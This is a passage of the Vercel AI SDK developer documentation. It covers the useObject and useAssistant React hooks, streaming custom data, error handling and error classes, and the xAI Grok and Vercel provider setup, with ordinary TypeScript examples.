`Generate 3 notifications for a messages app in this context:` + context,
});
return result.toTextStreamResponse();
}
Customized UI
useObject also provides ways to show loading and error states:
Loading State
The isLoading state returned by the useObject hook can be used for several
purposes:
- To show a loading spinner while the object is generated.
- To disable the submit button.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { isLoading, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && <Spinner />}
<button
onClick={() => submit('Messages during finals week.')}
disabled={isLoading}
>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Stop Handler
The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { isLoading, stop, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && (
<button type="button" onClick={() => stop()}>
Stop
</button>
)}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, or to disable the submit button:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { error, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{error && <div>An error occurred.</div>}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Event Callbacks
useObject provides optional event callbacks that you can use to handle life-cycle events.
- onFinish: Called when the object generation is completed.
- onError: Called when an error occurs during the fetch request.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
onFinish({ object, error }) {
// typed object, undefined if schema validation fails:
console.log('Object generation completed:', object);
// error, undefined if schema validation succeeds:
console.log('Schema validation error:', error);
},
onError(error) {
// error during fetch request:
console.error('An error occurred:', error);
},
});
return (
<div>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</div>
);
}
Configure Request Options
You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.
const { submit, object } = useObject({
api: '/api/use-object',
headers: {
'X-Custom-Header': 'CustomValue',
},
credentials: 'include',
schema: yourSchema,
});
title: OpenAI Assistants description: Learn how to use the useAssistant hook.
OpenAI Assistants
The useAssistant hook allows you to handle the client state when interacting with an OpenAI-compatible assistant API.
This hook is useful when you want to integrate assistant capabilities into your application,
with the UI updated automatically as the assistant is streaming its execution.
The useAssistant hook is supported in @ai-sdk/react, ai/svelte, and ai/vue.
Example
'use client';
import { Message, useAssistant } from '@ai-sdk/react';
export default function Chat() {
const { status, messages, input, submitMessage, handleInputChange } =
useAssistant({ api: '/api/assistant' });
return (
<div>
{messages.map((m: Message) => (
<div key={m.id}>
<strong>{`${m.role}: `}</strong>
{m.role !== 'data' && m.content}
{m.role === 'data' && (
<>
{(m.data as any).description}
<br />
<pre className={'bg-gray-200'}>
{JSON.stringify(m.data, null, 2)}
</pre>
</>
)}
</div>
))}
{status === 'in_progress' && <div />}
<form onSubmit={submitMessage}>
<input
disabled={status !== 'awaiting_message'}
value={input}
placeholder="What is the temperature in the living room?"
onChange={handleInputChange}
/>
</form>
</div>
);
}
import { AssistantResponse } from 'ai';
import OpenAI from 'openai';
const openai = new OpenAI({
apiKey: process.env.OPENAI_API_KEY || '',
});
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
// Parse the request body
const input: {
threadId: string | null;
message: string;
} = await req.json();
// Create a thread if needed
const threadId = input.threadId ?? (await openai.beta.threads.create({})).id;
// Add a message to the thread
const createdMessage = await openai.beta.threads.messages.create(threadId, {
role: 'user',
content: input.message,
});
return AssistantResponse(
{ threadId, messageId: createdMessage.id },
async ({ forwardStream, sendDataMessage }) => {
// Run the assistant on the thread
const runStream = openai.beta.threads.runs.stream(threadId, {
assistant_id:
process.env.ASSISTANT_ID ??
(() => {
throw new Error('ASSISTANT_ID is not set');
})(),
});
// forward the run status and stream message deltas
let runResult = await forwardStream(runStream);
// status can be: queued, in_progress, requires_action, cancelling, cancelled, failed, completed, or expired
while (
runResult?.status === 'requires_action' &&
runResult.required_action?.type === 'submit_tool_outputs'
) {
const tool_outputs =
runResult.required_action.submit_tool_outputs.tool_calls.map(
(toolCall: any) => {
const parameters = JSON.parse(toolCall.function.arguments);
switch (toolCall.function.name) {
// configure your tool calls here
default:
throw new Error(
`Unknown tool call function: ${toolCall.function.name}`,
);
}
},
);
runResult = await forwardStream(
openai.beta.threads.runs.submitToolOutputsStream(
threadId,
runResult.id,
{ tool_outputs },
),
);
}
},
);
}
Customized UI
useAssistant also provides ways to manage the chat message and input states via code and show loading and error states.
Loading and error states
To show a loading spinner while the assistant is running the thread, you can use the status state returned by the useAssistant hook:
const { status, ... } = useAssistant()
return(
<>
{status === "in_progress" ? <Spinner /> : null}
</>
)
Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:
const { error, ... } = useAssistant()
useEffect(() => {
if (error) {
toast.error(error.message)
}
}, [error])
// Or display the error message in the UI:
return (
<>
{error ? <div>{error.message}</div> : null}
</>
)
Controlled input
In the initial example, we have submitMessage and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also use uncontrolled APIs for more advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like append with your custom input and submit button components:
const { append, input } = useAssistant();
return (
<>
<MySubmitButton
onClick={() => {
// Send a new message to the AI provider
append({
role: 'user',
content: input,
});
}}
/>
</>
);
Configure Request Options
By default, the useAssistant hook sends an HTTP POST request to the /api/assistant endpoint with the message as part of the request body. You can customize the request by passing additional options to the useAssistant hook:
const { messages, input, handleInputChange, handleSubmit } = useAssistant({
api: '/api/custom-completion',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useAssistant hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with this additional information.
title: Streaming Custom Data description: Learn how to stream custom data to the client.
Streaming Custom Data
It is often useful to send additional data alongside the model's response. For example, you may want to send status information, the message ids after storing them, or references to content that the language model is referring to.
The AI SDK provides several helpers that allow you to stream additional data to the client
and attach it either to the Message or to the data object of the useChat hook:
- createDataStream: creates a data stream
- createDataStreamResponse: creates a response object that streams data
- pipeDataStreamToResponse: pipes a data stream to a server response object
The data is streamed as part of the response stream.
Sending Custom Data from the Server
In your server-side route handler, you can use createDataStreamResponse and pipeDataStreamToResponse in combination with streamText.
You need to:
- Call createDataStreamResponse or pipeDataStreamToResponse to get a callback function with a DataStreamWriter.
- Write to the DataStreamWriter to stream additional data.
- Merge the streamText result into the DataStreamWriter.
- Return the response from createDataStreamResponse (if that method is used).
Here is an example:
import { openai } from '@ai-sdk/openai';
import { generateId, createDataStreamResponse, streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
// immediately start streaming (solves RAG issues with status, etc.)
return createDataStreamResponse({
execute: dataStream => {
dataStream.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
messages,
onChunk() {
dataStream.writeMessageAnnotation({ chunk: '123' });
},
onFinish() {
// message annotation:
dataStream.writeMessageAnnotation({
id: generateId(), // e.g. id from saved DB record
other: 'information',
});
// call annotation:
dataStream.writeData('call completed');
},
});
result.mergeIntoDataStream(dataStream);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
}
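If your server writes to a Node.js ServerResponse (for example in an Express route) instead of returning a web Response, pipeDataStreamToResponse covers the same flow. A minimal sketch:
import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText, type Message } from 'ai';
import type { ServerResponse } from 'node:http';
export function handleChat(res: ServerResponse, messages: Message[]) {
pipeDataStreamToResponse(res, {
execute: dataStream => {
dataStream.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
messages,
});
result.mergeIntoDataStream(dataStream);
},
onError: error => (error instanceof Error ? error.message : String(error)),
});
}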
Sending Custom Sources
You can send custom sources to the client using the writeSource method on the DataStreamWriter:
import { openai } from '@ai-sdk/openai';
import { createDataStreamResponse, streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
return createDataStreamResponse({
execute: dataStream => {
// write a custom url source to the stream:
dataStream.writeSource({
sourceType: 'url',
id: 'source-1',
url: 'https://example.com',
title: 'Example Source',
});
const result = streamText({
model: openai('gpt-4o'),
messages,
});
result.mergeIntoDataStream(dataStream);
},
});
}
Processing Custom Data in useChat
The useChat hook automatically processes the streamed data and makes it available to you.
Accessing Data
On the client, you can destructure data from the useChat hook which stores all StreamData
as a JSONValue[].
import { useChat } from '@ai-sdk/react';
const { data } = useChat();
Accessing Message Annotations
Each message from the useChat hook has an optional annotations property that contains
the message annotations sent from the server.
Since the shape of the annotations depends on what you send from the server, you have to destructure them in a type-safe way on the client side.
Here we just show the annotations as a JSON string:
import { Message, useChat } from '@ai-sdk/react';
const { messages } = useChat();
const result = (
<>
{messages?.map((m: Message) => (
<div key={m.id}>
{m.annotations && <>{JSON.stringify(m.annotations)}</>}
</div>
))}
</>
);
Updating and Clearing Data
You can update and clear the data object of the useChat hook using the setData function.
const { setData } = useChat();
// clear existing data
setData(undefined);
// set new data
setData([{ test: 'value' }]);
// transform existing data, e.g. adding additional values:
setData(currentData => [...(currentData ?? []), { test: 'value' }]);
Example: Clear on Submit
'use client';
import { Message, useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit, data, setData } =
useChat();
return (
<>
{data && <pre>{JSON.stringify(data, null, 2)}</pre>}
{messages?.map((m: Message) => (
<div key={m.id}>{`${m.role}: ${m.content}`}</div>
))}
<form
onSubmit={e => {
setData(undefined); // clear stream data
handleSubmit(e);
}}
>
<input value={input} onChange={handleInputChange} />
</form>
</>
);
}
title: Error Handling description: Learn how to handle errors in the AI SDK UI
Error Handling
Error Helper Object
Each AI SDK UI hook also returns an error object that you can use to render the error in your UI. You can use the error object to show an error message, disable the submit button, or show a retry button.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit, error, reload } =
useChat({});
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}: {m.content}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => reload()}>
Retry
</button>
</>
)}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={handleInputChange}
disabled={error != null}
/>
</form>
</div>
);
}
Alternative: replace last message
Alternatively, you can write a custom submit handler that replaces the last message when an error is present.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const {
handleInputChange,
handleSubmit,
error,
input,
messages,
setMessages,
} = useChat({});
function customSubmit(event: React.FormEvent<HTMLFormElement>) {
if (error != null) {
setMessages(messages.slice(0, -1)); // remove last message
}
handleSubmit(event);
}
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}: {m.content}
</div>
))}
{error && <div>An error occurred.</div>}
<form onSubmit={customSubmit}>
<input value={input} onChange={handleInputChange} />
</form>
</div>
);
}
Error Handling Callback
Errors can be processed by passing an onError callback function as an option to the useChat, useCompletion or useAssistant hooks.
The callback function receives an error object as an argument.
import { useChat } from '@ai-sdk/react';
export default function Page() {
const {
/* ... */
} = useChat({
// handle error:
onError: error => {
console.error(error);
},
});
}
Injecting Errors for Testing
You might want to create errors for testing. You can easily do so by throwing an error in your route handler:
export async function POST(req: Request) {
throw new Error('This is a test error');
}
title: Smooth streaming Japanese text description: Learn how to smooth stream Japanese text
Smooth streaming Japanese text
You can smooth stream Japanese text by using the smoothStream function in streamText, with a regex that splits on either Japanese characters or word boundaries (note that experimental_transform is a streamText option on the server, not a useChat option):
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream({
chunking: /[\u3040-\u309F\u30A0-\u30FF]|\S+\s+/,
}),
});
title: Smooth streaming Chinese text description: Learn how to smooth stream Chinese text
Smooth streaming Chinese text
You can smooth stream Chinese text by using the smoothStream function in streamText, with a regex that splits on either Chinese characters or word boundaries:
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream({
chunking: /[\u4E00-\u9FFF]|\S+\s+/,
}),
});
title: AI_APICallError description: Learn how to fix AI_APICallError
AI_APICallError
This error occurs when an API call fails.
Properties
- url: The URL of the API request that failed
- requestBodyValues: The request body values sent to the API
- statusCode: The HTTP status code returned by the API
- responseHeaders: The response headers returned by the API
- responseBody: The response body returned by the API
- isRetryable: Whether the request can be retried based on the status code
- data: Any additional data associated with the error
Checking for this Error
You can check if an error is an instance of AI_APICallError using:
import { APICallError } from 'ai';
if (APICallError.isInstance(error)) {
// Handle the error
}
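A common use is branching on the error's properties, for example retrying only when isRetryable is set (a minimal sketch):
import { APICallError } from 'ai';
function shouldRetry(error: unknown): boolean {
if (APICallError.isInstance(error)) {
// retry only when the status code indicates a transient failure (e.g. 429 or 5xx):
return error.isRetryable;
}
return false;
}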
title: AI_DownloadError description: Learn how to fix AI_DownloadError
AI_DownloadError
This error occurs when a download fails.
Properties
- url: The URL that failed to download
- statusCode: The HTTP status code returned by the server
- statusText: The HTTP status text returned by the server
- message: The error message containing details about the download failure
Checking for this Error
You can check if an error is an instance of AI_DownloadError using:
import { DownloadError } from 'ai';
if (DownloadError.isInstance(error)) {
// Handle the error
}
title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError
AI_EmptyResponseBodyError
This error occurs when the server returns an empty response body.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_EmptyResponseBodyError using:
import { EmptyResponseBodyError } from 'ai';
if (EmptyResponseBodyError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError
AI_InvalidArgumentError
This error occurs when an invalid argument was provided.
Properties
- parameter: The name of the parameter that is invalid
- value: The invalid value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidArgumentError using:
import { InvalidArgumentError } from 'ai';
if (InvalidArgumentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError
AI_InvalidDataContentError
This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages.
Properties
- content: The invalid content value
- message: The error message describing the expected and received content types
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContentError using:
import { InvalidDataContentError } from 'ai';
if (InvalidDataContentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContent description: Learn how to fix AI_InvalidDataContent
AI_InvalidDataContent
This error occurs when invalid data content is provided.
Properties
- content: The invalid content value
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContent using:
import { InvalidDataContent } from 'ai';
if (InvalidDataContent.isInstance(error)) {
// Handle the error
}
title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError
AI_InvalidMessageRoleError
This error occurs when an invalid message role is provided.
Properties
- role: The invalid role value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidMessageRoleError using:
import { InvalidMessageRoleError } from 'ai';
if (InvalidMessageRoleError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError
AI_InvalidPromptError
This error occurs when the prompt provided is invalid.
Properties
- prompt: The invalid prompt value
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidPromptError using:
import { InvalidPromptError } from 'ai';
if (InvalidPromptError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError
AI_InvalidResponseDataError
This error occurs when the server returns a response with invalid data content.
Properties
- data: The invalid response data value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidResponseDataError using:
import { InvalidResponseDataError } from 'ai';
if (InvalidResponseDataError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolArgumentsError description: Learn how to fix AI_InvalidToolArgumentsError
AI_InvalidToolArgumentsError
This error occurs when invalid tool arguments were provided.
Properties
- toolName: The name of the tool with invalid arguments
- toolArgs: The invalid tool arguments
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidToolArgumentsError using:
import { InvalidToolArgumentsError } from 'ai';
if (InvalidToolArgumentsError.isInstance(error)) {
// Handle the error
}
title: AI_JSONParseError description: Learn how to fix AI_JSONParseError
AI_JSONParseError
This error occurs when JSON fails to parse.
Properties
- text: The text value that could not be parsed
- message: The error message including parse error details
Checking for this Error
You can check if an error is an instance of AI_JSONParseError using:
import { JSONParseError } from 'ai';
if (JSONParseError.isInstance(error)) {
// Handle the error
}
title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError
AI_LoadAPIKeyError
This error occurs when the API key is not loaded successfully.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadAPIKeyError using:
import { LoadAPIKeyError } from 'ai';
if (LoadAPIKeyError.isInstance(error)) {
// Handle the error
}
title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError
AI_LoadSettingError
This error occurs when a setting is not loaded successfully.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadSettingError using:
import { LoadSettingError } from 'ai';
if (LoadSettingError.isInstance(error)) {
// Handle the error
}
title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError
AI_MessageConversionError
This error occurs when message conversion fails.
Properties
- originalMessage: The original message that failed conversion
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_MessageConversionError using:
import { MessageConversionError } from 'ai';
if (MessageConversionError.isInstance(error)) {
// Handle the error
}
title: AI_NoAudioGeneratedError description: Learn how to fix AI_NoAudioGeneratedError
AI_NoAudioGeneratedError
This error occurs when no audio could be generated from the input.
Properties
- responses: Array of responses
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoAudioGeneratedError using:
import { NoAudioGeneratedError } from 'ai';
if (NoAudioGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError
AI_NoContentGeneratedError
This error occurs when the AI provider fails to generate content.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoContentGeneratedError using:
import { NoContentGeneratedError } from 'ai';
if (NoContentGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError
AI_NoImageGeneratedError
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message.
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
Checking for this Error
You can check if an error is an instance of AI_NoImageGeneratedError using:
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError
AI_NoObjectGeneratedError
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
Properties
- message: The error message.
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- response: Metadata about the language model response, including response id, timestamp, and model.
- usage: Request token usage.
- finishReason: Request finish reason. For example 'length' if the model generated the maximum number of tokens, which could result in a JSON parsing error.
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
Checking for this Error
You can check if an error is an instance of AI_NoObjectGeneratedError using:
import { generateObject, NoObjectGeneratedError } from 'ai';
try {
await generateObject({ model, schema, prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
console.log('Finish Reason:', error.finishReason);
}
}
title: AI_NoOutputSpecifiedError description: Learn how to fix AI_NoOutputSpecifiedError
AI_NoOutputSpecifiedError
This error occurs when no output format was specified for the AI response, and output-related methods are called.
Properties
message: The error message (defaults to 'No output specified.')
Checking for this Error
You can check if an error is an instance of AI_NoOutputSpecifiedError using:
import { NoOutputSpecifiedError } from 'ai';
if (NoOutputSpecifiedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError
AI_NoSuchModelError
This error occurs when a model ID is not found.
Properties
- modelId: The ID of the model that was not found
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchModelError using:
import { NoSuchModelError } from 'ai';
if (NoSuchModelError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError
AI_NoSuchProviderError
This error occurs when a provider ID is not found.
Properties
- providerId: The ID of the provider that was not found
- availableProviders: Array of available provider IDs
- modelId: The ID of the model
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchProviderError using:
import { NoSuchProviderError } from 'ai';
if (NoSuchProviderError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError
AI_NoSuchToolError
This error occurs when a model tries to call an unavailable tool.
Properties
- toolName: The name of the tool that was not found
- availableTools: Array of available tool names
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchToolError using:
import { NoSuchToolError } from 'ai';
if (NoSuchToolError.isInstance(error)) {
// Handle the error
}
title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError
AI_NoTranscriptGeneratedError
This error occurs when no transcript could be generated from the input.
Properties
- responses: Array of responses
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoTranscriptGeneratedError using:
import { NoTranscriptGeneratedError } from 'ai';
if (NoTranscriptGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_RetryError description: Learn how to fix AI_RetryError
AI_RetryError
This error occurs when a retry operation fails.
Properties
- reason: The reason for the retry failure
- lastError: The most recent error that occurred during retries
- errors: Array of all errors that occurred during retry attempts
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_RetryError using:
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
// Handle the error
}
title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError
AI_TooManyEmbeddingValuesForCallError
This error occurs when too many values are provided in a single embedding call.
Properties
- provider: The AI provider name
- modelId: The ID of the embedding model
- maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
- values: The array of values that was provided
Checking for this Error
You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:
import { TooManyEmbeddingValuesForCallError } from 'ai';
if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
// Handle the error
}
title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError
ToolCallRepairError
This error occurs when there is a failure while attempting to repair an invalid tool call.
This typically happens when the AI attempts to fix either
a NoSuchToolError or InvalidToolArgumentsError.
Properties
- originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolArgumentsError)
- message: The error message
- cause: The underlying error that caused the repair to fail
Checking for this Error
You can check if an error is an instance of ToolCallRepairError using:
import { ToolCallRepairError } from 'ai';
if (ToolCallRepairError.isInstance(error)) {
// Handle the error
}
title: AI_ToolExecutionError description: Learn how to fix AI_ToolExecutionError
AI_ToolExecutionError
This error occurs when there is a failure during the execution of a tool.
Properties
- toolName: The name of the tool that failed
- toolArgs: The arguments passed to the tool
- toolCallId: The ID of the tool call that failed
- message: The error message
- cause: The underlying error that caused the tool execution to fail
Checking for this Error
You can check if an error is an instance of AI_ToolExecutionError using:
import { ToolExecutionError } from 'ai';
if (ToolExecutionError.isInstance(error)) {
// Handle the error
}
title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError
AI_TypeValidationError
This error occurs when type validation fails.
Properties
- value: The value that failed validation
- message: The error message including validation details
Checking for this Error
You can check if an error is an instance of AI_TypeValidationError using:
import { TypeValidationError } from 'ai';
if (TypeValidationError.isInstance(error)) {
// Handle the error
}
title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError
AI_UnsupportedFunctionalityError
This error occurs when the requested functionality is not supported.
Properties
- functionality: The name of the unsupported functionality
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_UnsupportedFunctionalityError using:
import { UnsupportedFunctionalityError } from 'ai';
if (UnsupportedFunctionalityError.isInstance(error)) {
// Handle the error
}
title: xAI Grok description: Learn how to use xAI Grok.
xAI Grok Provider
The xAI Grok provider contains language model support for the xAI API.
Setup
The xAI Grok provider is available via the @ai-sdk/xai module. You can
install it with
pnpm add @ai-sdk/xai
Provider Instance
You can import the default provider instance xai from @ai-sdk/xai:
import { xai } from '@ai-sdk/xai';
If you need a customized setup, you can import createXai from @ai-sdk/xai
and create a provider instance with your settings:
import { createXai } from '@ai-sdk/xai';
const xai = createXai({
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the xAI provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
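For example, here is a sketch of a customized provider instance that uses the fetch option to log each request before delegating to the global fetch (the logging itself is illustrative):
import { createXai } from '@ai-sdk/xai';
const xai = createXai({
  apiKey: process.env.XAI_API_KEY,
  fetch: async (input, init) => {
    // inspect or modify the outgoing request here
    console.log('xAI request:', input);
    return fetch(input, init);
  },
});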
Language Models
You can create xAI models using a provider instance. The
first argument is the model id, e.g. grok-3.
const model = xai('grok-3');
Example
You can use xAI language models to generate text with the generateText function:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai('grok-3'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
xAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
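For example, a minimal streaming sketch with streamText:
import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';
const result = streamText({
  model: xai('grok-3'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}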
Chat Models
xAI chat models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = xai('grok-3', {
user: 'test-user', // optional unique user identifier
});
The following optional settings are available for xAI chat models:
- user string: A unique identifier representing your end-user, which can help xAI to monitor and detect abuse.
xAI chat models also support some model-specific provider options. You can pass them in the providerOptions argument:
const model = xai('grok-3');
await generateText({
model,
providerOptions: {
xai: {
reasoningEffort: 'high',
},
},
});
The following optional provider options are available for xAI chat models:
- reasoningEffort 'low' | 'medium' | 'high': Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| grok-3 | | | | |
| grok-3-fast | | | | |
| grok-3-mini | | | | |
| grok-3-mini-fast | | | | |
| grok-2-1212 | | | | |
| grok-2-vision-1212 | | | | |
| grok-beta | | | | |
| grok-vision-beta | | | | |
Image Models
You can create xAI image models using the .imageModel() factory method. For more on image generation with the AI SDK see generateImage().
import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: xai.image('grok-2-image'),
prompt: 'A futuristic cityscape at sunset',
});
Model-specific options
You can customize the image generation behavior with model-specific settings:
import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: xai.image('grok-2-image', {
maxImagesPerCall: 5, // Default is 10
}),
prompt: 'A futuristic cityscape at sunset',
n: 2, // Generate 2 images
});
Model Capabilities
| Model | Sizes | Notes |
|---|---|---|
| grok-2-image | 1024x768 (default) | xAI's text-to-image generation model, designed to create high-quality images from text prompts. It's trained on a diverse dataset and can generate images across various styles, subjects, and settings. |
title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.
Vercel Provider
The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0-1.0-md model supports text and image inputs and provides fast streaming responses.
You can create your Vercel API key at v0.dev.
Features
- Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
- Auto-fix: Identifies and corrects common coding issues during generation
- Quick edit: Streams inline edits as they're available
- OpenAI compatible: Can be used with any tool or SDK that supports OpenAI's API format
- Multimodal: Supports both text and image inputs
Setup
The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:
pnpm add @ai-sdk/vercel
Provider Instance
You can import the default provider instance vercel from @ai-sdk/vercel:
